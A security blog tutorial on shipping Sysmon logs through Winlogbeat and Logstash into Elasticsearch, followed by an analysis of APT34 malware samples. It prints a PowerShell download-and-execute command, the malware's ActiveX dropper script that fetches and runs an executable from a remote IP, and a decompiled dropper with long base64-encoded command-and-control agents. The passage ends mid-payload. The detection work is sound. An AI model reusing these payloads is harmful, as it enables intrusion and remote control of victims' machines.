APT

Summary

The previous post Monitoring for Windows Event Logs and the Untold Story of proper ELK Integration, explained how to leverage monitoring of Windows Event Log through Elasticsearch while using Kibana Winlogbeat and Logstash. The blog post also provided a list of Windows Event Log records (based on their functionality and Event ID) and also explained in details how to use Elastic’s Winlogbeat and Logstash products to ship these logs from any Windows Operating System (OS) to an Elasticsearch cluster and then index them. Finally, the post explained how we can use the filtering functionality through Logstash to normalize documents and extract metadata from them to create new fields before indexing them. Furthermore, the post explained how we can run some Elasticsearch DSL queries to get some documents of interest back from Elasticsearch. If you haven’t read this previous blog post then I suggest that you read it first before attempting to go through this blog post. This blog post cover more of the monitoring functionality and won’t cover many things that should be obvious to you by now if you read through the previous blog post. Just keep it in mind as you go through this blog post.

This blog post will explain how to use the Microsoft Sysinternal System monitor (sysmon) tool to gather additional metadata from activities occurring on any Windows system and show you how create Windows Event Logs from them through customization. In addition, it will show you how to ship these logs with Elastic Winlogbeat from your Windows OS and how you can use Logstash to extract metadata from these logs for creating fields that might be of an interest to you. This post will provide some filters and explain how you can use them to enhance your monitoring process and get better visibility. Finally, this blog post will include real-world examples on monitoring malware activity taken from FireEye’s APT34 blog post.

Assumption – Expectations – Credits

Before reading any further, I assume that you are a seasoned Elasticsearch programmer and have the essential skill-sets to index documents, create graphs in Kibana, use Elasticsearch DSL scripts and so on. I also assume that you have the fundamental understanding in information security and you understand the meaning of Windows Event Log records and their importance. If so, you should be good to go and just keep reading this post. As you will see, this blog post is broken the blog post to part I and part II.

Part I will explain how to leverage Sysmon, provide explanation about Windows Event Log records and provide a list of interesting recorders (based on their event ID) you may be interested in monitoring. Part I will also show you how to ship these Windows Event Log records from any Windows OS to a Logstash instance in your Elasticsearch cluster. The intention behind part I is not to reveal Windows Event Log records like they never existed before. Rather, it will show you how to create a fusion between Windows Event Logs generated by Sysmon and Elasticsearch.

Part II on the other hand, we focus on monitoring and detecting malware associated with APT34. On December 7 2017, FireEye has published the blog post Targeted attack in middle east by APT34 (APT a.k.a Advanced Persistent Threat). Thus, part II will show you how how to monitor for an activity on a Windows system that is compromised with malware variants seen used by APT34. Part II will also explain some of the technical expects of the malware (even though the scope of this blog post is not malware analysis) and also show you what type of information you could find in your Elasticsearch index. The credit for APT34 and the malware variants used in this blog post should go directly to FireEye.

The very last section references and credits provides more online resources and material I have used in this blog post.  You may want to check them out outside of reading this blog post. I (Yakov Goldberg) prepared this blog post to provide some of my experience and knowledge in the field. I truly believe that sharing is caring so I hope you find this information useful.

Part I – Sysmon Events, Elasticsearch Integration & Document Tuning

Sysinternal Sysmon

According to Microsoft, “System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.“. From my experience, one of the nicest things about Sysmon is that it collects artifacts and additional metadata about activities occurring on the Windows OS. These artifacts and metadata are then stored as Windows Event Log records under Sysmon.

Side Note: Once stored as Windows Event Log records on the system, these log can then get shipped to an Elasticsearch cluster using the Winlogbeat application as a sender and the Logstash application as a receiver. If you don’t know what Winlogbeat and Logstash applications are, I highly suggest that you Google read about them before going any further. Alternatively, read my previous blog post to learn more about them.

Sysmon is free and pretty easy to download, install and it can run as a service in the background on any Windows OS. Simply download Sysmon from here https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon. Once you have downloaded the tool to your system, simply type the following command to run it as a default:

Sysmon.exe -accepteula -i -l -n
Sysmon64.exe -accepteula -i -l -n

The flags associated with this execution are:

  • -l : Log loading of modules. Optionally take a list of processes to track
  • -i:  Install service and driver. Optionally take a configuration file.
  • -n: Log network connections. Optionally take a list of processes to track.

You can view the configuration by simply typing the following command: Sysmon -c

At this point, you should be able to see all Windows Event Log records created through Sysmon in Windows Event viewer under Application and Services Logs/Microsoft/Windows/Sysmon/Operational (on earlier Windows OS versions, Sysmon will store these logs under the Windows System log). Once the Sysmon process is running, Sysmon will start collecting artifacts and generate Windows Event Log records. The following table contain a list of Windows Event Logs created by default with the execution of Sysmon as a service:

Event ID Log Type Description
1 Microsoft-Windows-Sysmon/Operational Process Creation
2 Microsoft-Windows-Sysmon/Operational A process changed a file creation time
3 Microsoft-Windows-Sysmon/Operational Network Connection
4 Microsoft-Windows-Sysmon/Operational Sysmon service state changed
5 Microsoft-Windows-Sysmon/Operational Process terminated
6 Microsoft-Windows-Sysmon/Operational Driver loaded
7 Microsoft-Windows-Sysmon/Operational Image loaded
8 Microsoft-Windows-Sysmon/Operational CreateRemoteThread
9 Microsoft-Windows-Sysmon/Operational RawAccessRead
10 Microsoft-Windows-Sysmon/Operational ProcessAccess
11 Microsoft-Windows-Sysmon/Operational FileCreate
12 Microsoft-Windows-Sysmon/Operational RegistryEvent (Object create and delete)

 

One of the coolest things available with Sysmon is the ability for Sysmon to calculate the hashing algorithm of files associated with a process execution. When a process of interest executes on the system, Sysmon will then attempt to calculate the hash value of the file associated with this process. Sysmon can calculate MD5, SHA1, SHA256 and the IMPHASH value of that corresponding file as shown in the figure below (look in the Hashes: line):

Sysmon Event ID 1 hashes

Furthermore, Sysmon also allows us to create a customizable configuration file allowing us to create Windows Event Log records based on certain activities occurring on the system. For example, you can tell Sysmon to start monitoring activity related to WMI command execution by monitoring for the process wmiprvse.exe. The configuration file format is all in XML so it is fairly easy to customize on your own. If you don’t feel like customizing XML file for any reason then a list of specific configuration files for Sysmon can be downloaded files from this Github resource sysmon configs. Once you downloaded any of the configuration files, simply run them along with the -c flag as shown in the example below:

Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T0000_wmic_remote.xml -l -n 
Sysmon64.exe -c c:\Scripts\Sysmon\scripts\T1138_appcompat.xml -l -n

Here is another example of a configuration file:

<Sysmon schemaversion="3.4">
 <!-- Capture all hashes -->
 <HashAlgorithms>*</HashAlgorithms>
 <EventFiltering>
 <!-- Event ID 1 == Process Creation. -->
 <ProcessCreate onmatch="include">
 <ParentImage condition="end with">wmiprvse.exe</ParentImage>
 <ParentImage condition="contains">cmd.exe</ParentImage>
 <ParentImage condition="contains">wscript.exe</ParentImage>
 <ParentImage condition="contains">svchost.exe</ParentImage>
 <ParentImage condition="contains">powershell.exe</ParentImage>
 <ParentImage condition="contains">mshta.exe</ParentImage>
 <ParentImage condition="contains">office</ParentImage>
 <Image condition="end with">cscript.exe</Image>
 <Image condition="end with">wscript.exe</Image>
 <Image condition="end with">cmd.exe</Image>
 <Image condition="end with">powershell.exe</Image>
 <Image condition="end with">sh.exe</Image>
 <Image condition="end with">bash.exe</Image>
 <Image condition="end with">scrcons.exe</Image>
 <Image condition="end with">regsvr32.exe</Image> 
 <Image condition="end with">hh.exe</Image> 
 </ProcessCreate>
 <!-- Event ID 2 == File Creation Time. -->
 <FileCreateTime onmatch="include"/>
 <!-- Event ID 3 == Network Connection. -->
 <NetworkConnect onmatch="include"/>
 <!-- Event ID 5 == Process Terminated. -->
 <ProcessTerminate onmatch="include"/>
 <!-- Event ID 6 == Driver Loaded. -->
 <DriverLoad onmatch="include"/>
 <!-- Event ID 7 == Image Loaded. -->
 <ImageLoad onmatch="include"/>
 <!-- Event ID 8 == CreateRemoteThread. -->
 <CreateRemoteThread onmatch="include"/>
 <!-- Event ID 9 == RawAccessRead. -->
 <RawAccessRead onmatch="include"/>
 <!-- Event ID 10 == ProcessAccess. -->
 <ProcessAccess onmatch="include"/>
 <!-- Event ID 11 == FileCreate. -->
 <FileCreate onmatch="include"/>
 <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
 <RegistryEvent onmatch="include"/>
 <!-- Event ID 15 == FileStream Created. -->
 <FileCreateStreamHash onmatch="include" />
 <!-- Event ID 17,18 == PipeEvent. Log Named pipe created & Named pipe connected -->
 <PipeEvent onmatch="include"/>
 <!-- Event ID 19,20,21, == WmiEvent. Log all WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter activity-->
 <WmiEvent onmatch="include"/>
 </EventFiltering>
</Sysmon>

As you can see in the example above, the * (asterisk) symbol in the HashAlgorithms XML simply tell Sysmon to calculate all possible hashes of a executed process (i.e. MD5, SHA1, SHA256 and IMPHASH). When you get to read the Logstash configuration section, you will see how you can split these hashes to their own fields and how you can create tables of each field in Kibana. Alright, under the process creation section you can set triggers for process names including setting parent-child processes, conditions for each trigger and so on. Sysmon also allows you to generate other events for network connection, driver loaded and the list goes on and on. I would suggest that you read about Sysmon in other online resources so you can master Sysmon to its full capabilities. Some of these resources are mentioned in the reference section at the end of this post.

Winlogbeat Configuration

If you read the previous blog post, then you should know by now what Winlogbeat from Elastic is and you can configure it to ship Windows Event Log records to Logstash. In order to send Sysmon Windows Event Log records to be processed by Logstash, you must add these logs to the Winlogbeat configuration file (winlogbeat.yml) first. Simply add the following to your winlogbeat.yml file:

winlogbeat.event_logs: 
- name: Microsoft-Windows-Sysmon/Operational 
   fields: log_type: windowsevt

Side Note: You can always type the following PowerShell command in CLI to see what Windows Event Logs (by their name) are available for you to add to Winlogbeat configuration file:

Get-WinEvent -ListLog * | Format-List -Property LogName

That is it for the configuration portion of Winlogbeat. Of course, if you have not read the previous blog post, then you will also need to configure in Winlogbeat the target IP address an port of the server you are running Logstash on.

Logstash Configuration

If you had a chance to read the previous blog post then you should know by now how to filter and normalize documents received from Winlogbeat using Logstash. I would assume at this point that you have such filtering in place and you have been able to successfully filter Windows Event Log records using Winlogbeat and Logstash and index them properly.  As mentioned, one of the great things that Sysmon does is to calculate the hash value of running processes. By default Sysmon will only calculate one hash value. However, if you read through the Sysmon section, you have noticed that you can add the * (asterisk) symbol in the HashAlgorithms XML tag to simply tell Sysmon to calculate all possible hashes of a executed process (i.e. MD5, SHA1, SHA256 and IMPHASH). If that is the case then you should consider adding the following filters to your Logstash configuration file:

#split sha1 hash and sanitize to fields
if ([event_data][hashes][altsha1]) {
   mutate {
      split => ["[event_data][hashes][altsha1]" , "="]
      add_field => { "[event_data][hashes][sha1]" => "%{[event_data][hashes][altsha1]][1]}" }
      remove_field => [ "[event_data][hashes][altsha1]"]
   }
}

#split md5 hash and sanitize to fields
if ([event_data][hashes][altmd5]) {
   mutate {
      split => ["[event_data][hashes][altmd5]" , "="]
      add_field => { "[event_data][hashes][md5]" => "%{[event_data][hashes][altmd5]][1]}" }
      remove_field => [ "[event_data][hashes][altmd5]"]
   }
}

#split sha256 hash and sanitize to fields
if ([event_data][hashes][altsha256]) {
   mutate {
      split => ["[event_data][hashes][altsha256]" , "="]
      add_field => { "[event_data][hashes][sha256]" => "%{[event_data][hashes][altsha256]][1]}" }
      remove_field => [ "[event_data][hashes][altsha256]"]
   }
}

#split imphash hash and sanitize to fields
if ([event_data][hashes][altimphash]) {
   mutate {
     split => ["[event_data][hashes][altimphash]" , "="]
     add_field => { "[event_data][hashes][imphash]" => "%{[event_data][hashes][altimphash]][1]}" }
     remove_field => [ "[event_data][hashes][altimphash]"]
   }
}

Essentially, these filters will allow you to split your [event_data][hashes] field in your JSON document from one field that contains all hashes together and looks like that:

event_data.hashes

To separated fields where each field has its own field as shown belowt:

hash fields

Now that each hash value field is separated, you can simply stack them together for frequency analysis in Kibana through creating a table in visualization. And, if you did it successfully, then your table should look similar like the following table:

MD5 Stacking

Aside from splitting hashes to different fields, there is another other filtering technique that you can leverage to your advantage while normalizing Windows Event Logs records generated through Sysmon. Take for example the following PowerShell command :

powershell.exe -Command {IEX (New-ObjectNet.Webclient).DownloadString('http://93.163.123.173/evil.ps1')}

When this command executes on a system it will simply attempt to download the powershell script evil.ps1 from a remote IP address 93.163.123.173. During the execution process, Sysmon will generate a new event ID #1 and the message inside this event, will look as the following:

event_id1_evil.ps1

In the figure above you can clearly see that command as a part of the message under Commandline. That in mind, if the read my previous blog post, then you should be familiar with Grok filter through Logstash. Grok filtering enable you to create a filter for extracting the IP address and the PowerShell script (by filenames) inside the message field and put them in their own new fields respectively. To accomplish this, you will need to create and use the following Grok filter:

#split hashes to fields
if ([event_id] == 1) {
   grok {
      match => { "message" => "http://%{IP:[remote_ip]}/%{GREEDYDATA:[event_data][powershell_file]}'" }
   } 
}

If the filter worked properly, you should see new fields in the indexed document like those shown in the follow figure:

IPAdd_Powershell_filter

As you can see in the figure above, the there is a new field [event_data][powershell_file] that contains the fileanem evil.ps1 value and another field [remote_ip] which contains the IP address value. You can also see the Geographical (GEO) fields in the figure. These fields are populated also through the Logstash filter automatically if you configured them properly. If you don’t know how to get Logstash to populate the GEO fields from an IP address then please read the previous blog and it should give you an idea on how to achieve it. If the remote_ip field is populated properly through Logstash, then in Kibana you should be able to create a piechart like the one shown in the following figure:

IP_Address_piechart

Side Note: I only tried the grok filter above on strings containing a combination of the http and an IP address in the string. In real life, you will need to create multiple Grok filters for other string variations (for example, https and domain instead of an IP address). The goal in this blog post is to give you an idea on how you can leverage Grok filter to extract additional metadata from the message field and then normalize this data into new fields. Use the example above to extract other metadata.

PART II – Monitoring APT34 Tools

As mentioned in the credit section, on December 7 2017, FireEye has published the blog post Targeted attack in middle east by APT34. If you want to know more about APT34 then I would suggest you to read their blog post. Please note that this section does not provide any intelligence into APT34 operation nor associates this group with any country and so on. I am simply not an expert on this area and won’t claim to be one. That said, this section will show you how you can leverage Sysmon to monitor the activity of tools used by the threat actor APT34. In a nutshell, I simply downloaded APT34 tools from an online resource and then ran them in a controlled WindowsVM that is monitored by Sysmon. And, all the events that are generated by Sysmon in this WindowsVM get shipped to Elasticsearch via Winlogbeat and are also processed via Logstash (using the filters I mentioned in part I). This section provides technical analysis behind each tool and/or script used by APT34 from those I was able to freely download and execute. In addition, it provides examples as to what you could expect to see in Kibana, how indexed documents look a like and so on.

PowerShell Downloader

File Characteristics

Filename: dupdatechecker.doc 
MD5 Hash: d85818e82a6e64ca185edfddba2d1b76

According to FireEye’s blog, the file dupdatechecker.doc is downloaded from a remote server as a result of an execution of an .rtf file that attempts to exploit CVE-2017-0199. This file is not really a Word document file and it simply contains the following data:

<script> 
//kasper detect this one
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://94.23.172.164/dupdatechecker.exe\', \'c:/programdata/dupdatechecker.exe\'); c:/programdata/dupdatechecker.exe', 0);window.close();
</script>

The script inside this file suggests that on execution, this script will execute a PowerShell command to attempt and download another file from the same remote IP address. The URL is shown in the download file section and looks as such hXXp://94.23.172.164/dupdatechecker.exe. Taking into an assumption that this the script was running on a system that is monitored with Sysmon and PowerShell (refer to my previous blog post to learn how to configure PowerShell monitoring), you should expect to see the execution of that PowerShell script in the following Windows Event Log records:

Event ID Log Type Description
600 Windows PowerShell Provider “Variable” is Started
800 Windows PowerShell Pipeline execution details for command line
400 Windows PowerShell Engine state is changed from None to Available
4103 Windows PowerShell Module logging events
1 Microsoft-Windows-Sysmon/Operational Process Creation

 

When these Windows Event Log records are indexed to Elasticsearch, you should be able to see a document like the one shown in the following figure:

sysmon_eventid1_dupdatechecker_doc

Please note that in the figure above you also see the IP address in its own field [geoip][ip] and you also see GEO coordinates and the country associated with this IP address. Once again, this is possible through the filtering process in Logstash (as mentioned in the Logstash section). If you configured Logstash to get GEO location of fields containing IP addresses properly then you should be able to get the GEO coordinates and country fields as well. Alright lets check what this dupdatechecker.exe file is and what it does when executing on the system.

Trojan Dropper

File Characteristics  

Filename:     dupdatechecker.exe
File size:    32768 bytes
MD5 Hash:     c9f16f0be8c77f0170b9b6ce876ed7fb
Compile Time: 2017-07-04 09:53:48

Nothing unique about this binary executable besides the fact that it was developed in Microsoft .NET and compiled to a Portable Executable (PE) file. One way to tell that is when you search this file (by the file MD5 hash value c9f16f0be8c77f0170b9b6ce876ed7fb) in VirusTotal. Under the details section, you will see multiple sections but two of them should give you an idea about the origination of the file. The first section called .NET details and the second section is the PE imports section. The following figure shows these two sections:

.NET Variant Example

The .NET details section provides two unique GUIDs associated with this PE file. When working on .NET project in Visual Studio, these two GUIDs will get generated and will be unique (well somewhat unique as you will see in the additional variants section below) to that project. Once compiling this project to a PE file, these two GUIDs will be associated with this file. In the PE section (the second section) you will see that this PE file only imports one DLL file called mscoree.dll and only one Windows API function _CorExeMain from this DLL file. The Windows API  import function _CorExeMain from the DLL file mscoree.dll usually suggest that you are dealing with a PE file that was compiled from a .NET project. And, in an effort to validate that it is a .NET file, you can attempt to decompile this file via tools such as the ILSpy tool (look in the reference section below to learn when to obtain the tool from). In a nutshell, ILSpy decompiles .NET byte-code before the compilation process took place. Once you opened this PE file with ILSpy, you can simply browse through each folder in the tree until you get to the main() function as shown in the following figure:

ILSpy Tree

And once you click on the main() function, you see the following code:

 // exeruner.Program
private static void Main(string[] args)
{
 string text = "C:\\ProgramData\\Windows\\Microsoft\\java";
 bool flag = !Directory.Exists(text);
 if (flag)
 {
 Directory.CreateDirectory(text);
 }
 string value = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";\r\n${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACgAIgBOAGEAbQBlAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwAgAEEATgBEACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAATABJAEsARQAgACcAJQAiACsAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4ATgBhAG0AZQAuAFQAcgBpAG0AKAApACsAIgAlACcAIgApACkALgBsAGUAbgBnAHQAaAAgAC0AbAB0ACAAMgApACAAewANAAoAJABhAGkAZAA9AHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMgApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAyACkAfQA7ACQAcwBwACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsADQAKACQAcwBtACAAPQAgACQAZgBhAGwAcwBlADsAJABjAHQAIAA9ACAAMAA7ACQAZgBiACAAPQAgAEAAKAApADsAJAByAG4AIAA9ACAAIgAwADAAMAAiADsAJABhAGMAIAA9ACAAIgAwACIAOwAkAHIAdQBuACAAPQAgACQAdAByAHUAZQA7ACQAZQBjAD0AMAA7AA0ACgBXAGgAaQBsAGUAIAAoACQAcgB1AG4AKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AbQAgADIAMAAwADsADQAKAGkAZgAoACQAZQBjACAALQBnAGUAIAA1ACkAewBlAHgAaQB0AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGwAdAAgADEAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAwACQAKAAkAGMAdAApACIAOwAgAH0AZQBsAHMAZQBpAGYAIAAoACQAYwB0ACAALQBsAHQAIAAxADAAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAkACgAJABjAHQAKQAiADsAIAB9AGUAbABzAGUAIAB7ACAAJAByAG4AIAA9ACAAIgAkACgAJABjAHQAKQAiADsAIAB9AA0ACgAkAHIAYQBuAGQAIAA9ACAALQBqAG8AaQBuACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoADEAMAAgAC4ALgAgADkAOQApACAALQBDAG8AdQBuAHQAIAAoACUAewAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMQAgAC4ALgAgADYAKQAgAH0AKQApADsADQAKAHQAcgB5AHsAJABsAGEAcwB0AEEAZABkAHIAZQBzAHMAPQAgACIAJAAoACQAcgBhAG4AZAApACQAKAAkAGEAYwApACQAKAAkAHIAbgApADcAJAAoACQAYQBpAGQAKQAuAHAAcgBvAHgAeQBjAGgAZQBrAGUAcgAuAHAAcgBvACIAOwANAAoAJAByAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABuAHMAXQA6ADoARwBlAHQASABvAHMAdABBAGQAZAByAGUAcwBzAGUAcwAoACQAbABhAHMAdABBAGQAZAByAGUAcwBzACkAOwB9AGMAYQB0AGMAaAB7ACQAZQBjACsAKwA7AGMAbwBuAHQAaQBuAHUAZQA7AH0ADQAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAHQAWwAwAF0ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAOwAkAHIAcwAgAD0AIAAkAHIAZQBzAHUAbAB0AC4AUwBwAGwAaQB0ACgAJwAuACcAKQA7AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyACkAIAAtAGEAbgBkACAAKAAkAHIAcwBbADIAXQAgAC0AZQBxACAAMwApACkAewAkAHMAbQAgAD0AIAAkAGYAYQBsAHMAZQA7ACQAYQBjACAAPQAgACIAMAAiADsADQAKACQAbABlACAAPQAgACQAZgBiAC4ATABlAG4AZwB0AGgAOwBpAGYAIAAoACQAZgBiAFsAJABsAGUAbgAtADEAXQAgAC0AZQBxACAAMAAgAC0AYQBuAGQAIAAkAGYAYgBbACQAbABlAG4ALQAyAF0AIAAtAGUAcQAgADAAKQANAAoAewAkAGYAYgB0ACAAPQAgACQAZgBiAFsAMAAgAC4ALgAgACgAJABsAGUAIAAtACAAMwApAF0AOwB9AGUAbABzAGUAaQBmACAAKAAkAGYAYgBbACQAbABlACAALQAgADEAXQAgAC0AZQBxACAAMAApAHsAJABmAGIAdAAgAD0AIAAkAGYAYgBbADAAIAAuAC4AIAAoACQAbABlACAALQAgADIAKQBdADsAfQBlAGwAcwBlAHsAJABmAGIAdAAgAD0AIAAkAGYAYgA7AH0ADQAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHMAcAAsACAAJABmAGIAdAApADsAJABmAGIAIAA9ACAAQAAoACkAOwAkAGMAdAAgAD0AIAAwADsAYgByAGUAYQBrADsAfQANAAoAaQBmACAAKAAkAHMAbQApAHsAaQBmACAAKAAkAGMAdAAgAC0AZwB0ACAAMgA1ADAAKQAgAHsAJABjAHQAIAA9ACAAMAA7AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGUAcQAgACQAcgBzAFsAMwBdACkAewAkAGYAYgAgACsAPQAgACQAcgBzAFsAMABdADsAJABmAGIAIAArAD0AIAAkAHIAcwBbADEAXQA7ACQAZgBiACAAKwA9ACAAJAByAHMAWwAyAF0AOwAkAGMAdAAgAD0AIAAkAGMAdAAgACsAIAAzADsAfQB9AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADIANAApACAALQBhAG4AZAAgACgAJAByAHMAWwAxAF0AIAAtAGUAcQAgADEAMgA1ACkAKQB7ACQAcwBwACAAKwA9ACAAIgBcACIAIAArACAAJAByAHMAWwAyAF0AIAArACAAIgAiACAAKwAgACQAcgBzAFsAMwBdADsAJABzAG0AIAA9ACAAJAB0AHIAdQBlADsAJABhAGMAIAA9ACAAIgAxACIAOwAkAGMAdAAgAD0AIAAwADsAfQANAAoAaQBmACAAKAAoACQAcgBzAFsAMABdACAALQBlAHEAIAAxADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyADQAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMgBdACAALQBlAHEAIAAyADMANwApACAALQBhAG4AZAAgACgAJAByAHMAWwAzAF0AIAAtAGUAcQAgADEAMQAwACkAKQAgAHsAJAByAHUAbgA9ACQAZgBhAGwAcwBlADsAYgByAGUAYQBrADsAfQB9AA0ACgANAAoAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcwBwACkALgBsAGUAbgBnAHQAaAAgAC0AZwB0ACAAMABrAGIAKQB7AA0ACgAJAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADAAIgApACkADQAKAAkAewANAAoACQAJACQAZgBjACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAcwBwACAAfAAgAD8AIAB7ACAAJABfAC4AdAByAGkAbQAoACkAIAAtAG4AZQAgACIAIgAgAH0AOwANAAoACQAJACQAcgBlACAAKwA9ACAAJABmAGMALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkAfQANAAoACQBlAGwAcwBlAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkAewANAAoACQAJAE0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABzAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACgAJABzAHAAKwAiAC4AcABzADEAIgApACAALQBGAG8AcgBjAGUAOwANAAoACQB9AA0ACgAJAGUAbABzAGUAaQBmACAAKAAkAHMAcAAuAEUAbgBkAHMAVwBpAHQAaAAoACIAMgAiACkAKQANAAoACQB7AA0ACgAJAAkATQBvAHYAZQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIAAkAHMAcAAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuACAAKAAkAHMAcAArACIALgB2AGIAcwAiACkAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAH0ADQAKAA==\";\r\n${global:$http_ag} = \"JABzAHIAdgByACAAPQAgACIAaAB0AHQAcAA6AFwAXAAiACAAKwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQAbgBzAF0AOgA6AEcAZQB0AEgAbwBzAHQAQQBkAGQAcgBlAHMAcwBlAHMAKAAiAHcAdwB3AC4AcAByAG8AeAB5AGMAaABlAGsAZQByAC4AcAByAG8AIgApACAAKwAiAC8AdQBwAGQAYQB0AGUAXwB3AGEAcABwAC4AYQBzAHAAeAAiADsADQAKACQAawA9AGcAZQB0AG0AYQBjACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAB8ACAAJQB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnACgAPwA6AFsAMAAtADkAYQAtAGYAXQB7ADIAfQBbADoALQBdACkAewA1AH0AWwAwAC0AOQBhAC0AZgBdAHsAMgB9ACcAIAB9ADsADQAKAGkAZgAoACQAawApAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgACQAbQBhAHQAYwBoAGUAcwBbADAAXQAgAC0AcgBlAHAAbABhAGMAZQAgACIALQAiACwAIAAiACIAOwB9ACAAZQBsAHMAZQAgAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgAHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMQApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAxACkAfQB9AA0ACgAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ACAAPQAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIAArACAAIgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEoAYQB2AGEAXAAiACAAKwAgACQAewBnAGwAbwBiAGEAbAA6ACQAYQBpAGQAfQA7AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAG4AZAByAA0ACgB7AA0ACgAJAHAAYQByAGEAbQAoACQAZgBuAGEAbQBlACwAIAAkAGMAbgB0ACkADQAKAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAZgBuAGEAbQBlACIAIAAiADIAIgANAAoACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AVQBwAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACwAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABjAG4AdAApACkAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABhAGQAcgBDAHQADQAKAHsADQAKAAkAcABhAHIAYQBtACAAKAAkAHIAaQBkAEkAbgAsACAAJABhAGMAKQANAAoACQAkAGMAcgAgAD0AIABAACgAKQA7AA0ACgAJACQAZABhAHIA